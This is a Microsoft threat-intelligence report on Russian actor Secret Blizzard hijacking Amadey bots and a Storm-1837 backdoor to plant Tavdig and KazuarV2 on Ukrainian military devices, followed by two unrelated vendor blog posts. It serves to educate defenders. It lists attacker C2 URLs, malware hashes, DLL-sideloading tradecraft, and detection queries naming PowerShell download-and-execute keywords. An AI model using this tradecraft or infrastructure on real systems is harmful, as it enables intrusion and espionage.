As previously detailed, Secret Blizzard is known for targeting a wide array of sectors, but most prominently ministries of foreign affairs, embassies, government offices, defense departments, and defense-related companies worldwide. Secret Blizzard focuses on gaining long-term access to systems for intelligence collection, often seeking out advanced research and information of political importance, using extensive resources such as multiple backdoors. The United States Cybersecurity and Infrastructure Security Agency (CISA) has attributed Secret Blizzard to Center 16 of Russia’s Federal Security Service (FSB). Secret Blizzard overlaps with the threat actor tracked by other security vendors as Turla, Waterbug, Venomous Bear, Snake, Turla Team, and Turla APT Group.
Microsoft tracks Secret Blizzard campaigns and, when we are able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on Secret Blizzard’s activity to raise awareness of this threat actor’s tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity. In addition, we highlight that while Secret Blizzard’s use of infrastructure and access by other threat actors is unusual, it is not unique, and therefore organizations that have been compromised by one threat actor may also find themselves compromised by another through the initial intrusion.
Amadey bot use and post-compromise activitiesBetween March and April 2024, Microsoft observed Secret Blizzard likely commandeering Amadey bots to ultimately deploy their custom Tavdig backdoor. Microsoft tracks some cybercriminal activity associated with Amadey bots as Storm-1919. Storm-1919’s post-infection goal is most often to deploy XMRIG cryptocurrency miners onto victim devices. Amadey bots have been deployed by Secret Blizzard and other threat actors comprising Storm-1919 to numerous devices around the world during 2024.
Microsoft assesses that Secret Blizzard either used the Amadey malware as a service (MaaS) or accessed the Amadey command-and-control (C2) panels surreptitiously to download a PowerShell dropper on target devices. The PowerShell dropper contained a Base64-encoded Amadey payload appended by code that invoked a request to Secret Blizzard C2 infrastructure.
Figure 1. Amadey payload calling back to Secret Blizzard C2 infrastructureThe Amadey instance was version 4.18, but generally had the same functionality as the Amadey bot described in a Splunk blog from July 2023 analyzing version 3.83.
The Amadey sample gathered a significant amount of information about the victim system, including the administrator status and device name from the registry, and checked for installed antivirus software by seeing if it had a folder in C:\ProgramData. Numbers were recorded for each software found and likely sent back to the C2:
- Avast Software
- Avira
- Kaspersky Lab
- ESET
- Panda Security
- Doctor Web
- AVG
- 360TotalSecurity
- Bitdefender
- Norton
- Sophos
- Comodo
The retrieved information was gathered from the system to be encoded into the communication sent to the C2 at http://vitantgroup[.]com/xmlrpc.php. The Amadey bot then attempted to download two plugins from the C2 server:
- hxxp://vitantgroup[.]com/Plugins/cred64.dll
- hxxp://vitantgroup[.]com/Plugins/clip64.dll
Microsoft did not observe the two DLLs on the devices accessed by Secret Blizzard, but it is likely that they performed the same role as in other similar Amadey bots—to collect clipboard data and browser credentials. The need to encode the PowerShell dropper with a separate C2 URL controlled by Secret Blizzard could indicate that Secret Blizzard was not directly in control of the C2 mechanism used by the Amadey bot.
Subsequently, Microsoft observed Secret Blizzard downloading their custom reconnaissance or survey tool. This tool was selectively deployed to devices of further interest by the threat actor—for example, devices egressing from STARLINK IP addresses, a common signature of Ukrainian front-line military devices. The survey tool consisted of an executable that decrypted a batch script or cmdlets at runtime using what appears to be a custom RC4 algorithm. One of the batch scripts invoked the following command:
Figure 2. Batch script commandThe batch script collected a survey of the victim device, including the directory tree, system information, active sessions, IPv4 route table, SMB shares, enabled security groups, and time settings. This information was encrypted using the same RC4 function and transmitted to the previously referenced Secret Blizzard C2 server at hxxps://citactica[.]com/wp-content/wp-login.php.
In another use of the survey tool observed by Microsoft Threat Intelligence, the executable simply decrypted the cmdlet dir “%programdata%\Microsoft\Windows Defender\Support. The %programdata%\Microsoft\Windows Defender\Support folder contains various Microsoft Defender logs, such as entries of detected malicious files.
Microsoft assesses that this cmdlet was invoked to determine if Microsoft Defender was enabled and whether previous Amadey activity had been flagged by the engine. Since several of the targeted devices observed by Microsoft had Microsoft Defender disabled during initial infection, the Secret Blizzard implants were only observed by Microsoft weeks or months after initial malware deployment.
Microsoft assesses that Secret Blizzard generally used the survey tool to determine if a victim device was of further interest, in which case it would deploy a PowerShell dropper containing the Tavdig backdoor payload (rastls.dll) and a legitimate Symantec binary with the name (kavp.exe), which is susceptible to DLL-sideloading. The C2 configuration for Tavdig was:
- hxxps://icw2016.coachfederation[.]cz/wp-includes/images/wp/
- hxxps://hospitalvilleroy[.]com[.]br/wp-includes/fonts/icons/
On several of the victim devices, the Tavdig loader was deployed using an executable named procmap.exe, which used the Microsoft Macro Assembler (MASM) compiler (QEditor). Microsoft assesses that procmap.exe was used to compile and run malicious ASM files on victim devices within Ukraine in March 2024, which then invoked a PowerShell script that subsequently loaded the Amadey bots and the Tavdig backdoor.
Secret Blizzard then used the Tavdig backdoor—loaded into kavp.exe—to conduct further reconnaissance on the device, including user info, netstat, and installed patches. Secret Blizzard also used Tavdig to import a registry file into the registry of the victim device, which likely installed the persistence mechanism and payload for the KazuarV2 backdoor.
Figure 3. Example of how Amadey bots were used to load the Tavdig backdoor
The KazuarV2 payload was often injected into a browser process such as explorer.exe or opera.exe to facilitate command and control with compromised web servers hosting the Secret Blizzard relay and encryption module (index.php). This module facilitated encryption and onward transmission of command output and exfiltrated data from the affected device to the next-level Secret Blizzard infrastructure.
Storm-1837 PowerShell backdoor useMicrosoft has observed Storm-1837 (overlaps with activity tracked by other security providers as Flying Yeti and UAC-0149) targeting devices belonging to the military of Ukraine since December 2023. Storm-1837 is a Russia-based threat actor that has focused on devices used by Ukrainian drone operators. Storm-1837 uses a range of PowerShell backdoors including the backdoor that the Computer Emergency Response Team of Ukraine (CERT-UA) has named Cookbox as well as an Android backdoor impersonating a legitimate system used for AI processing called “Griselda”, which according to CERT-UA is based on the Hydra Android banking malware and facilitates the collection of session data (HTTP cookies), contacts, and keylogging. In May 2024, Cloudflare detailed a Storm-1837 espionage phishing campaign against Ukrainian military devices for which Storm-1837 used both GitHub and Cloudflare for staging and C2.
In January 2024, Microsoft observed a military-related device in Ukraine compromised by a Storm-1837 backdoor configured to use the Telegram API to launch a cmdlet with credentials (supplied as parameters) for an account on the file-sharing platform Mega. The cmdlet appeared to have facilitated remote connections to the account at Mega and likely invoked the download of commands or files for launch on the target device. When the Storm-1837 PowerShell backdoor launched, Microsoft noted a PowerShell dropper deployed to the device. The dropper was very similar to the one observed during the use of Amadey bots and contained two base64 encoded files containing the previously referenced Tavdig backdoor payload (rastls.dll) and the Symantec binary (kavp.exe).
As with the Amadey bot attack chain, Secret Blizzard used the Tavdig backdoor loaded into kavp.exe to conduct initial reconnaissance on the device. Secret Blizzard then used Tavdig to import a registry file, which was used to install and provide persistence for the KazuarV2 backdoor, which was subsequently observed launching on the affected device.
Although Microsoft did not directly observe the Storm-1837 PowerShell backdoor downloading the Tavdig loader, based on the temporal proximity between the execution of the Storm-1837 backdoor and the observation of the PowerShell dropper, Microsoft assesses that it is likely that the Storm-1837 backdoor was used by Secret Blizzard to deploy the Tavdig loader.
Summary assessmentsMicrosoft Threat Intelligence is still investigating how Secret Blizzard gained control of the Storm-1837 backdoor or Amadey bots to download its own tools onto devices in Ukraine. It is possible, for example, that Secret Blizzard operators could have purchased the use of Amadey bots, or it may have surreptitiously commandeered a part of the Amadey attack chain.
Regardless of the means, Microsoft Threat Intelligence assesses that Secret Blizzard’s pursuit of footholds provided by or stolen from other threat actors highlights this threat actor’s prioritization of accessing military devices in Ukraine. During its operations, Secret Blizzard has used an RC4 encrypted executable to decrypt various survey cmdlets and scripts, a method Microsoft assesses Secret Blizzard is likely to use beyond the immediate campaign discussed here.
Secret Blizzard deployed tools to these (non-domain-joined) devices that are encoded for espionage against large domain-joined environments. However, this threat actor has also built new functionality into them to make them more relevant for the espionage specifically conducted against Ukrainian military devices. In addition, Microsoft assesses Secret Blizzard has likely also attempted to use these footholds to tunnel and escalate toward strategic access at the Ministry level.
When parts one and two of this blog series are taken together, it indicates that Secret Blizzard has been using footholds from third parties—either by surreptitiously stealing or purchasing access—as a specific and deliberate method to establish footholds of espionage value. Nevertheless, Microsoft assesses that while this approach has some benefits that could lead more threat adversaries to use it, it is of less use against hardened networks, where good endpoint and network defenses enable the detection of activities of multiple threat adversaries for remediation.
MitigationsTo harden networks against the Secret Blizzard activity listed above, defenders can implement the following:
Strengthen Microsoft Defender for Endpoint configuration
- Microsoft Defender XDR customers can implement attack surface reduction rules to harden an environment against techniques used by threat actors.
- Block execution of potentially obfuscated scripts.
- Block process creations originating from PSExec and WMI commands.
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion.
- Block abuse of exploited vulnerable signed drivers.
- Block Webshell creation for Servers.
- Enable network protection in Microsoft Defender for Endpoint.
- Ensure that tamper protection is enabled in Microsoft Dender for Endpoint.
- Run endpoint detection and response in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Strengthen Microsoft Defender Antivirus configuration
- Turn on PUA protection in block mode in Microsoft Defender Antivirus.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving threat actor tools and techniques.
- Turn on Microsoft Defender Antivirus real-time protection.
Strengthen operating environment configuration
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. Implement PowerShell execution policies to control conditions under which PowerShell can load configuration files and run scripts.
- Turn on and monitor PowerShell module and script block logging.
- Implement PowerShell execution policies to control conditions under which PowerShell can load configuration files and run scripts.
- Turn on and monitor PowerShell module and script block logging.
Microsoft Defender Antivirus detects this threat as the following malware:
- Trojan:Win32/Tavdig.Crypt
- Trojan:JS/Kazuar.A
Microsoft Defender Antivirus detects additional threat components that may be related as the following malware:
- Trojan:Win32/Amadey
- Trojan:MSIL/Amadey
- TrojanDownloader:Win32/Amadey
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
- Secret Blizzard Actor activity detected
Surface instances of the Secret Blizzard indicators of compromise file hashes.
let fileHashes = dynamic(["Ee8ef58f3bf0dab066eb608cb0f167b1585e166bf4730858961c192860ceffe9", "d26ac1a90f3b3f9e11491f789e55abe5b7d360df77c91a597e775f6db49902ea", "d7e528b55b2eeb6786509664a70f641f14d0c13ceec539737eef26857355536e", "dfdc0318f3dc5ba3f960b1f338b638cd9645856d2a2af8aa33ea0f9979a9ca4c", "ced8891ea8d87005de989f25f0f94634d1fc70ebb37302cf21aa0c0b0e13350f", "Ee8ef58f3bf0dab066eb608cb0f167b1585e166bf4730858961c192860ceffe9"]); union ( DeviceFileEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents" ), ( DeviceEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents" ), ( DeviceImageLoadEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents" ), ( DeviceProcessEvents | where SHA256 in (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents" ) | order by Timestamp descSurface instances of the Secret Blizzard indicators of compromise C2s.
let domainList = dynamic(["citactica.com", "icw2016.coachfederation.cz", "hospitalvilleroy.com.br", "vitantgroup.com", "brauche-it.de", "okesense.oketheme.com", "coworkingdeamicis.com", "plagnol-charpentier.fr"]); union ( DnsEvents | where QueryType has_any(domainList) or Name has_any(domainList) | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents" ), ( IdentityQueryEvents | where QueryTarget has_any(domainList) | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents" ), ( DeviceNetworkEvents | where RemoteUrl has_any(domainList) | project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents" ), ( DeviceNetworkInfo | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks) | mv-expand DnsAddresses, ConnectedNetworks | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList) | project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo" ), ( VMConnection | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames) | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList) | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection" ), ( W3CIISLog | where csHost has_any(domainList) or csReferer has_any(domainList) | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog" ), ( EmailUrlInfo | where UrlDomain has_any(domainList) | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo" ), ( UrlClickEvents | where Url has_any(domainList) | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents" ) | order by TimeGenerated descAdditional hunting for likely malicious PowerShell commands queries can be found in this repository.
Look for PowerShell execution events that might involve a download.
// Finds PowerShell execution events that could involve a download. DeviceProcessEvents | where Timestamp > ago(7d) | where FileName in~ ("powershell.exe", "powershell_ise.exe") | where ProcessCommandLine has "Net.WebClient" or ProcessCommandLine has "DownloadFile" or ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "Invoke-Shellcode" or ProcessCommandLine has "http" or ProcessCommandLine has "IEX" or ProcessCommandLine has "Start-BitsTransfer" or ProcessCommandLine has "mpcmdrun.exe" | project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLineLook for encoded PowerShell execution events.
// Detect Encoded PowerShell DeviceProcessEvents | where ProcessCommandLine matches regex @'(\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s).*([A-Za-z0-9+/]{50,}[=]{0,2})' | extend DecodedCommand = replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine))) Microsoft Sentinel id: f58a7f64-acd3-4cf6-ab6d-be76130cf251 name: Detect Encoded Powershell description: | This query will detect encoded Powershell based on the parameters passed during process creation. This query will also work if the PowerShell executable is renamed or tampered with since detection is based solely on a regex of the launch string. requiredDataConnectors: - connectorId: MicrosoftThreatProtection dataTypes: - DeviceProcessEvents tactics: - Execution query: | DeviceProcessEvents | where ProcessCommandLine matches regex @'(\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s).*([A-Za-z0-9+/]{50,}[=]{0,2})' | extend DecodedCommand = replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine)))Look for PowerShell downloads.
id: c34d1d0e-1cf4-45d0-b628-a2cfde329182 name: PowerShell downloads description: | Finds PowerShell execution events that could involve a download. requiredDataConnectors: - connectorId: MicrosoftThreatProtection dataTypes: - DeviceProcessEvents query: | DeviceProcessEvents | where Timestamp > ago(7d) | where FileName in~ ("powershell.exe", "powershell_ise.exe") | where ProcessCommandLine has "Net.WebClient" or ProcessCommandLine has "DownloadFile" or ProcessCommandLine has "Invoke-WebRequest" or ProcessCommandLine has "Invoke-Shellcode" or ProcessCommandLine has "http" or ProcessCommandLine has "IEX" or ProcessCommandLine has "Start-BitsTransfer" or ProcessCommandLine has "mpcmdrun.exe" | project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine Threat intelligence reportsMicrosoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal, to get more information about this threat actor.
Microsoft Defender Threat Intelligence IndicatorTypeAssociationLast seenhxxps://citactica[.]com/wp-content/wp-login.phpC2 domain Survey Tool and Amadey dropperSecret BlizzardApril 2024a56703e72f79b4ec72b97c53fbd8426eb6515e3645cb02e7fc99aaaea515273eTavdig payload (rastls.dll)Secret BlizzardApril 2024hxxps://icw2016.coachfederation[.]cz/wp-includes/images/wp/Tavdig C2 domainSecret BlizzardApril 2024 hxxps://hospitalvilleroy[.]com[.]br/wp-includes/fonts/icons/Tavdig C2 domainSecret BlizzardApril 2024f9ebf6aeb3f0fb0c29bd8f3d652476cd1fe8bd9a0c11cb15c43de33bbce0bf68Executable susceptible to DLL-sideload (kavp.exe)Secret BlizzardJan-April 2024d26ac1a90f3b3f9e11491f789e55abe5b7d360df77c91a597e775f6db49902ea Survey tool (ddra.exe)Secret BlizzardApril 2024d7e528b55b2eeb6786509664a70f641f14d0c13ceec539737eef26857355536e PowerShell dropper for Amadey bot (nnas.ps1)Secret BlizzardMarch 2024hxxps://brauche-it[.]de/wp-includes/blocks/blocksu9ky0oKazuarV2 C2Secret BlizzardJune 2024hxxps://okesense.oketheme[.]com/wp-includes/sodium_compat/sodium_compatT4FF1aKazuarV2 C2 Secret BlizzardJune 2024 hxxps://coworkingdeamicis[.]com/wp-includes/Text/TextYpRm9l KazuarV2 C2 Secret Blizzard June 2024 hxxps://plagnol-charpentier[.]fr/wp-includes/random_compat/random_compata0zW7QKazuarV2 C2 Secret Blizzard June 2024 dfdc0318f3dc5ba3f960b1f338b638cd9645856d2a2af8aa33ea0f9979a9ca4c Amadey bot (av.exe/ dctooux.exe)Storm-1919March 2024ced8891ea8d87005de989f25f0f94634d1fc70ebb37302cf21aa0c0b0e13350f Amadey bot (dctooux.exe)Storm-1919March 2024ee8ef58f3bf0dab066eb608cb0f167b1585e166bf4730858961c192860ceffe9MASM32 utility (procmap.exe)Storm-1919March 2024hxxp://vitantgroup[.]com/xmlrpc.phpAmadey C2Storm-1919March 2024 Indicators of compromise References- https://securelist.com/the-epic-turla-operation/65545/
- https://www.darkreading.com/endpoint-security/upgraded-kazuar-backdoor-offers-stealthy-power
- https://cyble.com/blog/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
- https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/
- https://www.welivesecurity.com/2018/01/09/turlas-backdoor-laced-flash-player-installer/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a
- https://attack.mitre.org/groups/G0010/
- https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html
- https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine/
- https://socprime.com/blog/uac-0149-attack-detection-hackers-launch-a-targeted-attack-against-the-armed-forces-of-ukraine-as-cert-ua-reports/
- https://cert.gov.ua/article/6278620
- https://www.theregister.com/2024/05/31/crowdforce_flyingyeti_ukraine/
- https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine appeared first on Microsoft Security Blog.
Microsoft Defender XDR demonstrates 100% detection coverage across all cyberattack stages in the 2024 MITRE ATT&CK® Evaluations: Enterprise
For the sixth year in a row, Microsoft Defender XDR demonstrated industry-leading extended detection and response (XDR) capabilities in the independent MITRE ATT&CK® Evaluations: Enterprise. The cyberattack used during the detection test highlights the importance of a unified XDR platform and showcases Defender XDR as a leading solution for securing your multi-operating system estate, with the following results:
Figure 1. Diagram of Microsoft Defender XDR’s MITRE Tactics, Techniques, and Procedures (TTP) coverage for all cyberattack stages in Detection.- Achieved industry-leading, cross-platform detection: 100% technique level detections across all attack stages for Linux and macOS threats leveraging our new extended Berkeley Packet Filter (eBPF) Linux sensor and macOS behavioral monitoring engine that delivers rich actionable content.
- Delivered zero false positives, providing powerful security without overwhelming the security operations center (SOC). Defender XDR accurately alerted on and blocked only malicious activity every time so the SOC can focus their limited time and resources on responding to real cyberthreats at hand. Key to this result are critical cross-platform capabilities like remote encryption detection for gaining deeper visibility into the cyberattacker’s machines and behavior monitoring for detecting emerging threats on macOS.
- Equips the SOC with powerful technology like Microsoft Security Copilot, the industry’s first generative AI for security, to thwart attacks with contextual insight and speed with capabilities like script analysis that translates obfuscated PowerShell scripts into intuitive explanations of a script’s role in the cyberattack.
- Deep visibility into remote encryption, providing unprecedented visibility into encryption attempts originating from remote machines that might not even be onboarded to Defender XDR and putting an end to an advanced cyberattack vector being used in over 70% of recent ransomware cases.¹
Supercharge your SecOps effectiveness with XDR.
Learn moreDefender XDR is the industry’s broadest natively integrated XDR platform spanning endpoints, hybrid identities, email, collaboration tools, software as a service (SaaS) apps, and data with centralized visibility, powerful analytics, and automatic attack disruption, a powerful response capability unique to Microsoft.
A note on this year’s emulation: It is Microsoft’s opinion that the Protection test does not mirror realistic cyberthreats that organizations face. The Protection test methodology differed significantly from the Detection test that emulated an end-to-end attack scenario reflective of the cyberthreat landscape. See our statement below.
Customer reality is core to Microsoft’s testing approachMicrosoft Security’s mission is to build a safer world while enabling all organizations, users, and services to be as productive as possible. On the ground this means equipping security analysts with a holistic, actionable view of the cyberthreat landscape to minimize time to remediate legitimate bad actors.
As we develop our product, we strive to find the right balance between providing industry-leading security while ensuring under-sourced security operations teams are not flooded with false positives. We hold ourselves accountable for delivering on this goal by regularly participating in product evaluations to identify gaps and improve our products. This year, our conclusion from the MITRE protection test is that it was designed to evade protection mechanisms to the extent that it is unrepresentative of an actual cyberattack, a methodology that Microsoft disagrees with.
The core issue is the micro-testing methodology, which is inconsistent with how cyberattackers typically operate, moving laterally within organizations by gaining access to identities and privileges over time. These broader signals are critical for distinguishing between benign and malicious activities so we can balance protecting organizations from cyberattacks while supporting the broadest set of benign use cases across a massive customer base worldwide.
For example, MITRE used “micro emulations” starting with a highly privileged user and applications signed by a trusted certificate to conduct cyberattack steps in isolation without adequate context. Signed apps executed by privileged users is a benign scenario we see on thousands of Windows machines a day. Using a trusted certificate isn’t suspicious unless the associated user was compromised—context that the MITRE test lacked. Nor were there signals provided to enable us to determine that the certificate in the trusted root authority had been compromised or was seen to be signing malicious applications.
Microsoft will not implement the test’s recommendations as they do not reflect cyberattack patterns on customer environments. Doing so would cause outages for legitimate customer scenarios.
We appreciate the ongoing collaborative dialogue with MITRE on the topic of testing methodology and look forward to our continued partnership into the future.
How Microsoft fended off adversaries in the Detection testIn previous evaluations, MITRE scoped emulated behaviors to a specific cyberthreat actor group, like Secret Blizzard. This year, MITRE has added ransomware as an attack category informing a range of malicious behaviors carried out against Windows and Linux. For the macOS portion of the emulation, MITRE applied adversarial behaviors inspired by cyberthreat actors that the Democratic People’s Republic of North Korea (DPRK) sponsors. Microsoft Threat Intelligence tracks these groups at a granular level, for example, Sapphire Sleet, Ruby Sleet, Moonstone Sleet, and others that commonly escalate privileges and target user credentials on macOS.
Figure 2. Diagram of participating vendors’ TTP coverage for all cyberattack stages in DetectionLet’s take a closer look at how Microsoft Defender XDR once again achieved industry-leading results in this year’s MITRE evaluation and how Microsoft is shaping the future of security to respond to the most prevalent cyberthreats like ransomware.
A leader in detection for every cyberattack stage: 100% technique level detections for Linux and macOS cyberthreats Figure 3. Diagram of Microsoft Defender XDR’s MITRE TTP coverage for Linux and macOS in DetectionOrganizations often have diverse digital estates spanning multiple operating systems, which is why Microsoft invests heavily in ensuring detection for all major operating systems is both accurate and actionable. Microsoft’s industry-leading cross-platform results are driven by a combination of continuous investments, such as:
1. Extending our generative AI solution, Security Copilot, beyond Windows.
Security Copilot is the only security AI product that combines a specialized language model with security-specific capabilities from Microsoft. These capabilities incorporate a growing set of security-specific skills informed by our unique global threat intelligence and more than 78 trillion daily signals. Summarizing incidents, guiding response actions, using natural language for advanced threat hunting, and analyzing obfuscated PowerShell scripts are just some of the ways Security Copilot helps analysts accelerate workflows and gain new skills. In this evaluation, script analysis played a key role for macOS where we see human-readable explanations alongside the code as well as MITRE Tactics, Techniques, and Procedures (TTPs). This way analysts can quickly understand how the adversary is using the file or script.
Figure 4: Step 2.5 – System Services – launchctl (T1569.001), alongside Security Copilot script analysis for macOS that makes alerts more actionable2. Delivering enhanced behavioral monitoring capabilities to detect emerging cyberthreats even earlier on macOS.
Effective security is about the quality and actionability of detections, not just the quantity. These principles guide how we’ve built industry-leading security across Windows, Linux, and macOS. Let’s look at step Mac 4.08 Credentials from Password Stores: Keychain by a suspicious file as an example. Keychain-related file access happens often on macOS, even when a machine is idle. On average, these files may be accessed well over 400 times per hour. This level of activity is normal for many popular applications, such as OneDrive, Adobe Creative Cloud, and the built-in macOS apps. However, sorting out normal versus suspicious access poses a significant challenge for many vendors. We gain this deeper analysis through a combination of advanced behavior monitoring and content scanning, along with Microsoft’s exclusive threat intelligence. This approach helps pinpoint genuinely suspicious access, like those from us.zoom.ZoomHelperTool, providing analysts with the precise data they need to respond effectively.
Figure 5. MacOS and our cross-platform customers also receive the full context richness provided to Windows around what a malicious file capabilities are which includes a list of MITRE TTPs, strings, imports, and many other file attributes to provide comprehensive context of a cyberattack within a singular portal experience. Figure 6. macOS suspicious file alert with a clear description and information on why us.zoom.ZoomHelperTool was considered a suspicious file. Generated Information generated by multivariate machine learning models. Zero false positives across Linux, macOS, and WindowsWhen benign activities are flagged as malicious, security analysts end up wasting time and resources investigating. At a scale of potentially hundreds to thousands of alerts a day, false positives quickly lead to team burnout and eroded trust in security measures. This year, MITRE introduced a false positive metric by weaving in innocuous actions like legitimate file-sharing in the cyberattack steps to see if evaluated solutions would generate unnecessary alerts. Microsoft employs machine learning-based detections, only alerting on anomalous activity that seems to originate from malicious intent. This approach is how we deliver powerful security without overwhelming the SOC.
Microsoft’s dedication to protection with minimal false positives is evident in regularly occurring, public antivirus assessments conducted by endpoint testing authorities like AV-Comparatives, AV-Test, and SE Labs.
Figure 7. Number of false positives generated in this year’s MITRE evaluation. Deep visibility into remote encryption attemptsSince 2022, Microsoft has observed a spike in cyberattackers using remote encryption, where a cyberattacker uses a compromised device to encrypt other devices in a given network. As the latest Microsoft Digital Defense Report points out, 70% percent of successful human-operated ransomware cyberattacks have applied this technique. Gaining insight into a cyberattacker’s machine is typically a blind spot for many antivirus and endpoint detection and response solutions. Defender XDR, however, provides analysts with this critical visibility so that even if an unmanaged device is compromised, it can protect your hybrid organization from advanced cyberattacks like ransomware.
Figure 8. Step 16.36 – Data Encrypted for Impact (T1486) Empowering defenders with the security they needAs the cyberthreat landscape rapidly evolves, Microsoft is committed to empowering defenders with industry-leading, cross-platform XDR. Our evaluation philosophy is to reflect the real world by configuring the product as customers would in line with industry best practices. In the MITRE Evaluations, as with all simulations, Microsoft Defender XDR achieved industry-leading results without manual processing or fine-tuning and can be run in customer environments without generating an untenable number of false positives. Microsoft’s commitment to delivering cybersecurity while minimizing false positives is reflected in regularly occurring public evaluations.
We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.
Learn moreTo learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1Microsoft Digital Defense Report 2024
The post Microsoft Defender XDR demonstrates 100% detection coverage across all cyberattack stages in the 2024 MITRE ATT&CK® Evaluations: Enterprise appeared first on Microsoft Security Blog.
New Microsoft Purview features help protect and govern your data in the era of AI
In today’s evolving digital landscape, safeguarding data has become a challenge for organizations of all sizes. The ever-expanding data estate, the volume and complexity of cyberattacks, increasing global regulations, and the rapid adoption of AI are shifting how cybersecurity and data teams secure and govern their data. Today, more than 95% of organizations are implementing or developing an AI strategy, requiring data protection and governance strategies to be optimized for AI adoption.1 Microsoft Purview is designed to help you protect and govern all your data, regardless of where it lives and travels, for the era of AI.
Historically, organizations have relied on the traditional approach to data security and governance, largely involving stitching together fragmented solutions. According to Gartner®, “75% of security leaders are actively pursuing a security vendor consolidation strategy as of 2022.”2 Consolidation, however, is no easy feat. In a recent study, more than 95% of security leaders acknowledge that unifying the handling of data security, compliance, and privacy across teams and tools is both a priority and a challenge.3 These approaches often fall short because of duplicate data, redundant alerts, and siloed investigations, ultimately leading to increased data risks. Over time, this approach has been increasingly difficult for organizations to maintain.
Secure and govern your entire data estate with Microsoft Purview Unify how you protect and govern your data with Microsoft PurviewUnlike traditional data security and governance strategies that require disparate solutions to achieve comprehensive data protection, Microsoft Purview is purpose-built to unify data security, governance, and compliance into a single platform experience. This integration aims to reduce complexity, simplify management, and mitigate risk, while helping enhance efficiency across teams to support a culture of collaboration. With Microsoft Purview you can:
- Enable comprehensive data protection.
- Support compliance and regulatory requirements.
- Help safeguard AI Innovation.
To meet our growing customer needs, the team has been delivering a lot of innovation at a rapid pace. In this blog, we’re excited to recap all the new capabilities we announced at Microsoft Ignite last month.
Enable comprehensive data protectionMicrosoft data security solutions
